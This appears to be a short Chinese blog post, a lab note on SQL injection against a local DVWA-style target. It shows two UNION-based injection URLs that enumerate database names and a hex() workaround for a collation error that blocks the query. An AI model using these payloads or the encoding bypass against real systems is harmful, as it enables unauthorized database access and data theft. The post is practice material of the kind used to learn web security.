SQL查询时出现错误 “Illegal mix of collations for operation 'UNION'”

1.在本地测试的时候,发现一个错误哦

sql 注入进行查看所有数据库名的时候,

 

 

 

百度查看,说的是编码问题,本地测试还能改一下编码,实战怎么办~

解决办法:

使用16进制进行读取

http://10.211.55.8:804/vulnerabilities/sqli/?id=1' union select 1,schema_name from information_schema.schemata #&Submit=Submit#   最开始payload。

 

http://10.211.55.8:804/vulnerabilities/sqli/?id=1' union select 1,hex(schema_name) from information_schema.schemata #&Submit=Submit#   16进制读取payload。

 

 

 

 

上面的Surname 是读取出来的数据库名 16 进制。

解码一下16进制就可以了。

 

 

 

posted @ 2020-07-17 16:48  G0mini  阅读(3669)  评论(0编辑  收藏  举报